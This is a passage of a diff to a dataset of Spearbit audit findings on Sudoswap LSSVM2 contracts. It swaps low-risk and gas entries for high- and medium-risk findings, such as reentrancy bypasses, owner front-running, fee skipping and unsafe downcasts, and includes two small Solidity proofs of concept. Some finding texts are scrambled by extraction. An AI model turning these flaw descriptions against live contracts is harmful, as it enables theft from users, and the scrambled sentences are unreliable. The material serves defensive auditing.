supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } 7", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to unde- fined behavior", + "title": "Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "As commented \"Note: All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. * Swapping using multiple tokens in the same transaction is possible, but the slippage checks * & the return values will be meaningless and may lead to undefined behavior.\" This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps. Summing up their inputAmount and remainingValue will not be meaningful and lead to accounting errors and undefined behavior (as noted).", + "body": "The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells as noted in the comment: \"// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set\"). this While ERC1155.swapTokenForSpecificNFTs(), trading fee of only tradeFee (instead of 2*tradeFee). enforced in is LSSVMPairERC721.swapTokenForSpecificNFTs() LSSVMPairERC1155.swapTokenForAnyNFTs() and LSSVMPair- a enforces Affected LPs of pairs targeted by LSSVMPairERC1155. swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Missing array length equality checks may lead to incorrect or undefined behavior", + "title": "Royalty not always being taken into account leads to incorrect protocol accounting", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions taking two array type parameters and not checking that their lengths are equal may lead to incorrect or undefined behavior when accidentally passing arrays of unequal lengths.", + "body": "The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens will be received. Then it calls swapNFTs- ForToken() with 0 as minExpectedTokenOutput; so it will accept any amount of tokens. The swapNFTsForToken() does subtract the Royalties which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller. The same happens in robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However there it is compared to the results of getBuyInfo(); so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. 8 function getSellNFTQuote(uint256 numNFTs) ... { ( (...., outputAmount, ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ... ) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ....swapNFTsForToken(..., 0, ...); } ... ,! } function swapNFTsForToken(...) ... { ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); ,! }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Owners may have funds locked if newOwner is EOA in transferOwnership()", + "title": "Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In transferOwnership(), if newOwner has zero code.length (i.e. EOA), newOwner.isContract() will be false and therefore, if block will be ignored. As the function is payable, any msg.value from the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH.", + "body": "The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. 9 function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Use of transferFrom may lead to NFTs getting locked forever", + "title": "changeSpotPriceAndDelta() only uses ERC721 version of balanceOf()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "ERC721 NFTs may get locked forever if the recipient is not aware of ERC721 for some reason. While safeTransferFrom() is used for ERC1155 NFTs (which has the _doSafeTransferAcceptanceCheck check on recipient and does not have an option to avoid this), transferFrom() is used for ERC721 NFTs presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which has the _checkOnERC721Received check on the recipient).", + "body": "The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter of the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Single-step ownership change introduces risks", + "title": "_pullTokenInputAndPayProtocolFee() doesn't check that tokens are received", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks.", + "body": "The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the to- kens after doing safeTransferFrom(). This can be an issue with fee on transfer tokens. This is also an issue with (accidentally) non-existing tokens, as safeTransferFrom() won't revert on that, see POC below. Note: also see issue \"Malicious router mitigation may break for deflationary tokens\". function _pullTokenInputAndPayProtocolFee(...) ... { ... _token.safeTransferFrom(msg.sender, _assetRecipient, saleAmount); ... } Proof Of Concept: // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import \"hardhat/console.sol\"; import {ERC20} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/tokens/ERC20.sol\"; ,! import {SafeTransferLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/SafeTransferLib.sol\"; ,! contract test { using SafeTransferLib for ERC20; function t() public { ERC20 _token = ERC20(address(1)); _token.safeTransferFrom(msg.sender, address(0), 100); console.log(\"after safeTransferFrom\"); } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "getAllPairsForSettings() may run out of gas", + "title": "A malicious settings contract can call onOwnershipTransferred() to take over pair", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getAllPairsForSettings() has a loop over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large. Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside. function getAllPairsForSettings(address settings) external view returns (address[] memory) { uint256 numPairs = pairsForSettings[settings].length(); ... for (uint256 i; i < numPairs;) { ... unchecked { ++i; } } ... }", + "body": "The function onOwnershipTransferred() can be called from a pair via call(). This can be done It can either before transferOwnership() or after it. If it is called before then it updates the AssetRecipient. only be called after the transferOwnership() when an alternative (malicious) settings contract is used. In that situation pairInfos[] is overwritten and the original owner is lost; so effectively the pair can be taken over. Note: if the settings contract is malicious then there are different ways to take over the pair, but using this approach the vulnerabilities can be hidden. 11 function onOwnershipTransferred(address prevOwner, bytes memory) public payable { ILSSVMPair pair = ILSSVMPair(msg.sender); require(pair.poolType() == ILSSVMPair.PoolType.TRADE, \"Only TRADE pairs\"); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior", + "title": "One can attempt to steal a pair's ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but notice unexpected behavior if deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is partially implemented with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: \"// TODO: implement\") and other supporting logic required in swap().", + "body": "Anyone can pass the enrolled pair's address instead of a splitter address in bulkWithdrawFees() to effectively call the pair's withdrawAllETH() instead of a splitter's withdrawAllETH(). Anyone can attempt to steal/drain all the ETH from a pair. However, the pair's withdrawAllETH() sends ETH to the owner, which in this case is the settings contract. The settings contract is unable to receive ETH as currently implemented. So the attempt reverts.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices", + "title": "swap() could mix tokens with ETH", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from execut- ing beyond a certain user-specified deadline. This is presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However two router functions robustSwapETH- ForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter and all functions in VeryFastRouter are missing this modifier and the user parameter required for it. Users attempting to swap using these two swap functions do not have a way to specify a deadline for their execution unlike the other swap functions in this router. If the front-end does not highlight or warn about this, then the user swaps may get executed after a long time depending on the tip included in the transaction and the network congestion. This causes greater exposure for the swaps to volatile market prices.", + "body": "The function swap() adds the output of swapNFTsForToken() to the ethAmount. Although this only happens when order.isETHSell == true , this value could be set to the wrong value accidentally or on purpose. Then the number of received ERC20 tokens could be added to the ethAmount, which is clearly unwanted. The resulting ethAmount is returned to the user. Luckily the router (normally) doesn't have extra ETH so the impact should be limited. function swap(Order calldata swapOrder) external payable { uint256 ethAmount = msg.value; if (order.isETHSell && swapOrder.recycleETH) { ... outputAmount = pair.swapNFTsForToken(...); ... ethAmount += outputAmount; ... } ... // Send excess ETH back to token recipient if (ethAmount > 0) { payable(swapOrder.tokenRecipient).safeTransferETH(ethAmount); } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Missing function to deposit ERC1155 NFTs after pair creation", + "title": "Using a single tokenRecipient in VeryFastRouter could result in locked NFTs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() are apparently used to deposit ERC721 NFTs and ERC20s into appropriate pairs after their creation. According to the project team, this is used \"for various UIs to consolidate approvals + emit a canonical event for deposits.\" However, an equivalent function for depositing ERC1155 NFTs is missing. This prevents ERC1155 NFTs from being deposited into pairs after creation for scenarios anticipated similar to ERC721 NFTs and ERC20 tokens.", + "body": "VeryFastRouter uses a single tokenRecipient address for both ETH/tokens and NFTs, unlike LSSVMRouter which uses a separate tokenRecipient and nftRecipient. It is error-prone to have a single tokenRecipient receive both tokens and NFTs, especially when the other/existing LSSVMRouter has a separate nftRecipient. VeryFastRouter.swap() sends both sell order tokens to tokenRe- cipient and buy order NFTs to tokenRecipient. Front-ends integrating with both routers (or migrating to the new one) may surprise users by sending both tokens+NFTs to the same address when interacting with this router. This coupled with the use of nft.transferFrom() may result in NFTs being sent to contracts that are not ERC-721 receivers and get them locked forever.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: Medium Risk" ] }, { - "title": "Reading from state is more gas expensive than using msg.sender", + "title": "Owner can mislead users by abusing changeSpotPrice() and changeDelta()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Solmate's Owned.sol contract implements the concept of ownership (by saving during contract con- struction the deployer in the owner state variable) and owner-exclusive functions via the onlyOwner() modifier. Therefore, within functions protected by the onlyOwner() modifier, the addresses stored in msg.sender and owner will be equal. So, if a function of said characteristics has to make use of the address of the owner, it is cheaper to use msg.sender than owner, because the latter reads from the contract state (using SLOAD opcode) while the former doesn't (address is directly retrieved via the cheaper CALLER opcode). Reading from state (SLOAD opcode which costs either 100 or 2100 gas units) costs more gas than using the msg.sender environmental variable (CALLER opcode which costs 2 units of gas). Note: withdrawERC20() already uses msg.sender function withdrawETH(uint256 amount) public onlyOwner { payable(owner()).safeTransferETH(amount); ... } function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner { a.safeTransfer(msg.sender, amount); }", + "body": "A malicious owner could set up a pair which promises to buy NFTs for high prices. As soon as someone tries to trade, the owner could frontrun the transaction by setting the spotprice to 0 and gets the NFT for free. Both changeSpotPrice() and changeDelta() can be used to immediately change trade parameters where the aftereffects depends on the curve being used. Note: The swapNFTsForToken() parameter minExpectedTokenOutput and swapTokenForSpecificNFTs() param- eter maxExpectedTokenInput protect users against sudden price changes. But users might not always set them in an optimal way. A design goal of the project team is that the pool owner can quickly respond to changing market conditions, to prevent unnecessary losses. function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { ... } function changeDelta(uint128 newDelta) external onlyOwner { ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wast- ing gas", + "title": "Pair may receive less ETH trade fees than expected under certain conditions", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Not caching storage variables that are accessed multiple times within a loop causes waste of gas. If not cached, the solidity compiler will always read the value of protocolFeeMultiplier from storage during each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory variable, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", + "body": "Depending on the values of protocol fee and royalties, if _feeRecipient == _assetRecipient, the pair will receive less trade fees than expected. Assume a scenario where inputAmount == 100, protocolFee == 30, royaltyTotal == 60 and tradeFeeAmount == 20. This will result in a revert because of underflow in saleAmount -= tradeFeeAmount; when _feeRecipient != _assetRecipient. However, when _feeRecipient == _assetRecipient, the pair will receive trade fees of 100 - 30 - 60 = 10, whereas it normally would have expected 20.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again", + "title": "Swapping tokens/ETH for NFTs may exhibit unexpected behavior for certain values of input amount, trade fees and royalties", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "factory is being sent as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which is saving gas because it is not required to read the value again. _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller); However, in LSSVMPairERC1155.sol#L181, the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter. _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller); This creates an unnecessary asymmetry between the two contracts which are expected to be similar and also a possible gas optimization by avoiding a call to the factory getter.", + "body": "The _pullTokenInputAndPayProtocolFee() function pulls ERC20/ETH from caller/router and pays protocol fees, trade fees and royalties proportionately. Trade fees have a threshold of MAX_FEE == 50%, which allows 2*fee to be 100%. Royalty amounts could technically be any percentage as well. This allows edge cases where the protocol fee, trade fee and royalty amounts add up to be > inputAmount. In LSSVMPairERC20, the ordering of subtracting/transferring the protocolFee and royaltyTotal first causes the final attempted transfer of tradeFeeAmount to either revert because of unavailable funds or uses any balance funds from the pair itself. In LSSVMPairETH, the ordering of subtracting/transferring the tradeFees and royaltyTotal first causes the final attempted transfer of protocolFee to either revert because of unavailable funds or uses any balance funds from the pair itself.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Variables only set at construction time could be made immutable", + "title": "NFTs may be exchanged for 0 tokens when price decreases too much", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contracts runtime code before it is returned by replacing all references to immutable variables by the values assigned to the them; so the compiler does not reserve a storage slot for these variables. Declaring variables only set at construction time as immutable results in saving one call per variable to SSTORE (0x55) opcode, thus saving gas during construction.", + "body": "The sale of multiple NFTs, in combination with linear curves, results in a price decrease. When the resulting price is below 0, then getSellInfo() calculates how many NFTs are required to reach a price of 0. However, the complete number of NFTs is transferred from the originator of the transaction, even while the last few NFTs are worth 0. This might be undesirable for the originator. function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 totalPriceDecrease = delta * numItems; if (spotPrice < totalPriceDecrease) { ... uint256 numItemsTillZeroPrice = spotPrice / delta + 1; numItems = numItemsTillZeroPrice; } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Hoisting check out of loop will save gas", + "title": "balanceOf() can be circumvented via reentrancy and two pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The check numIdsFound == maxIdsNeeded will never be true before the outer for loop finishes iterating over maxIdsNeeded because numIdsFound is conditionally incremented only by 1 in each iteration.", + "body": "A reentrancy issue can occur if two pairs with the same ERC1155 NFTid are deployed. Via a call to swap NFTs, the ERC1155 callback onERC1155BatchReceived() is called. This callback can start a second NFT swap via a second pair. As the second pair has its own reentrancy modifier, this is allowed. This way the balanceOf() check of _takeNFTsFromSender() can be circumvented. If a reentrant call, to a second pair, supplies a sufficient amount of NFTs then the balanceOf() check of the original call can be satisfied at the same time. We haven't found a realistic scenario to abuse this with the current routers. Permissionless routers will certainly increase the risk as they can abuse isRouter == true. If the router is mali- cious then it also has other ways to steal the NFTs; however with the reentrancy scenario it might be less obvious this is happening. Note: ERC777 tokens also contain such a callback and have the same interface as ERC20 so they could be used in an ERC20 pair. function _takeNFTsFromSender(IERC1155 _nft, uint256 numNFTs, bool isRouter, address routerCaller) ... { ... if (isRouter) { ... uint256 beforeBalance = _nft.balanceOf(_assetRecipient, _nftId); ... router.pairTransferERC1155From(...); // reentrancy with other pair require((_nft.balanceOf(_assetRecipient, _nftId) - beforeBalance) == numNFTs, ...); // circumvented } else { ... } ,! }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Functionality of safeBatchTransferFrom() is not used", + "title": "Function call() is risky and can be restricted further", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function pairTransferERC1155From() allow that transfer of multiple id's of ERC1155 NFTs. The rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom(), might be better as it only accesses one id and uses less gas because no for loop is necessary. However future version of Sudoswap might support multiple ids. In that case its better to leave as is. function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts,...) ... { ... nft.safeBatchTransferFrom(from, to, ids, amounts, bytes(\"\")); }", + "body": "The function call() is powerful and thus risky. To reduce the risk it can be restricted further by dis- allowing potentially dangerous function selectors. This is also a step closer to introducing permissionless routers. function call(address payable target, bytes calldata data) external onlyOwner { ILSSVMPairFactoryLike _factory = factory(); require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result,) = target.call{value: 0}(data); require(result, \"Call failed\"); } 16", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Using != 0 instead of > 0 can save gas", + "title": "Incorrect newSpotPrice and newDelta may be obtained due to unsafe downcasts", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0.", + "body": "When calculating newSpotPrice in getBuyInfo(), an unsafe downcast from uint256 into uint128 may occur and silently overflow, leading to much less value for newSpotPrice than expected. function getBuyInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 inputValue, uint256 tradeFee, uint256 protocolFee ) { ... } // get the pair's virtual nft and token reserves uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // calculate the amount to send in uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... // set the new virtual reserves newSpotPrice = uint128(spotPrice + inputValueWithoutFee); // token reserve ... Same happens when calculating newDelta in getSellInfo(): function getSellInfo( uint128 spotPrice, uint128 delta, uint256 numItems, uint256 feeMultiplier, uint256 protocolFeeMultiplier ) external pure override returns ( Error error, uint128 newSpotPrice, uint128 newDelta, uint256 outputValue, uint256 tradeFee, uint256 protocolFee ) { PoC ... // get the pair's virtual nft and eth/erc20 balance uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // set the new virtual reserves newDelta = uint128(nftBalance + numItems); // nft reserve ... Proof of concept about how this wouldn't revert but silently overflow: 17 import \"hardhat/console.sol\"; contract test{ constructor() { uint256 a = type(uint128).max; uint256 b = 2; uint128 c = uint128(a + b); console.log(c); // c == 1, no error } }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Using >>1 instead of /2 can save gas", + "title": "Fewer checks in pairTransferNFTFrom() and pairTransferERC1155From() than in pairTransfer- ERC20From()", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "A division by 2 can be calculated by shifting one to the right (>>1). While the DIV opcode uses 5 gas, the SHR opcode only uses 3 gas.", + "body": "The functions pairTransferNFTFrom() and pairTransferERC1155From() don't verify that the cor- rect type of pair is used, whereas pairTransferERC20From() does. This means actions could be attempted on the wrong type of pairs. These could succeed for example if a NFT is used that supports both ERC721 and ERC1155. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\" The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } function pairTransferNFTFrom(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferERC1155From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Retrieval of ether balance of contract can be gas optimized", + "title": "A malicious collection admin can reclaim a pair at any time to deny enhanced setting royalties", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance with a discount of 15 units of gas.", + "body": "A collection admin can forcibly/selectively call reclaimPair() prematurely (before the advertised and agreed upon lockup period) to unilaterally break the settings contract at any time. This will effectively lead to a DoS to the pair owner for the enhanced royalty terms of the setting despite paying the upfront fee and agreeing to a fee split in return. This is because the unlockTime is enforced only on the previous pair owner and not on collection admins. A malicious collection admin can advertise very attractive setting royalty terms to entice pair owners to pay a high upfront fee to sign-up for their settings contract but then force-end the contract prematurely. This will lead to the pair owner losing the paid upfront fee and the promised attractive royalty terms. A lax pair owner who may not be actively monitoring SettingsRemovedForPair events before the lockup period will be surprised at the prematurely forced settings contract termination by the collection admin, loss of their earlier paid upfront fee and any payments of default royalty instead of their expected enhanced amounts.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Function parameters should be validated at the very beginning for gas optimizations", + "title": "PropertyCheckers and Settings not sufficiently restricted", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Function parameters should be validated at the very beginning of the function to allow typical execu- tion paths and revert on the exceptional paths, which will lead to gas savings over validating later.", + "body": "The LSSVMPairFactory accepts any address for external contracts which contain critical logic but there are no sanity checks done on them. These are the _bondingCurve, _propertyChecker and settings con- tracts. The contracts could perhaps be updated later via a proxy pattern or a create2/selfdestruct pattern which means that it's difficult to completely rely on them. Both _propertyChecker and settings contracts have a factory associated: PropertyCheckerFactory and StandardSettingsFactory. It is straightforward to enforce that only contracts created by the factory can be used. For the bondingCurves there is a whitelist that limits the risk. function createPairERC721ETH(..., ICurve _bondingCurve, ..., address _propertyChecker, ...) ... { ... // no checks on _bondingCurve and _propertyChecker } function toggleSettingsForCollection(address settings, address collectionAddress, bool enable) public { ... // no checks on settings } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { bondingCurveAllowed[bondingCurve] = isAllowed; emit BondingCurveStatusUpdate(bondingCurve, isAllowed); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Loop counters are not gas optimized in some places", + "title": "A malicious router can skip transfer of royalties and protocol fee", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Loop counters are optimized in many parts of the code by using an unchecked {++i} (unchecked + prefix increment). However, this is not done in some places where it is safe to do so.", + "body": "A malicious router, if accidentally/intentionally whitelisted by the protocol, may implement pair- TransferERC20From() functions which do not actually transfer the number of tokens as expected. This is within the protocol's threat model as evidenced by the use of before-after balance checks on the _assetRecipient for saleAmount. However, similar before-after balance checks are missing for transfers of royalties and protocol fee payments. the protocol/factory intention- Royalty recipients do not receive their royalties from the malicious router if ally/accidentally whitelists one. The protocol/factory may also accidentally whitelist a malicious router that does not transfer even the protocol fee.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization MerklePropertyChecker.sol#L22," + "Severity: Medium Risk" ] }, { - "title": "Mixed use of custom errors and revert strings is inconsistent and uses extra gas", + "title": "Malicious front-end can sneak intermediate ownership changes to perform unauthorized actions", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In some parts of the code, custom errors are declared and later used (CurveErrorCodes and Own- able Errors), while in other parts, classic revert strings are used in require statements. Instead of using error strings, custom errors can be used, which would reduce deployment and runtime costs. Using only custom errors would improve consistency and gas cost. This would also avoid long revert strings which consume extra gas. Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505.", + "body": "LSSVMPair implements an onlyOwner multicall function to allow owner to batch multiple calls. Natspec indicates that this is \"Intended for withdrawing/altering pool pricing in one tx, only callable by owner, can- not change owner.\" The check require(owner() == msg.sender, \"Ownership cannot be changed in multi- call\"); with a preceding comment \"Prevent multicall from malicious frontend sneaking in ownership change\" indicates the intent of the check and that a malicious front-end is within the threat model. While the post-loop check prevents malicious front-ends from executing ownership changing calls that attempt to persist beyond the multicall, this still allows one to sneak in an intermediate ownership change during a call -> perform malicious actions under the new unauthorized malicious owner within onOwnershipTransferred() callback -> change ownership back to originally authorized msg.sender owner before returning from the callback and successfully executing any subsequent (onlyOwner) calls and the existing check. While a malicious front-end could introduce many attack vectors that are out-of-scope for detecting/preventing in backend contracts, an unauthorized ownership change seems like a critical one and warrants additional checks for onlyOwner multicall to prevent malicious actions from being executed in the context of any newly/temporarily unauthorized owner.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Gas Optimization" + "Severity: Medium Risk" ] }, { - "title": "Array length read in each iteration of the loop wastes gas", + "title": "Missing override in authAllowedForToken prevents authorized admins from toggling settings and reclaiming pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If not cached, the Solidity compiler will always read the length of the array from storage during each iteration. For storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory array, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", + "body": "Manifold admins are incorrectly not allowed by 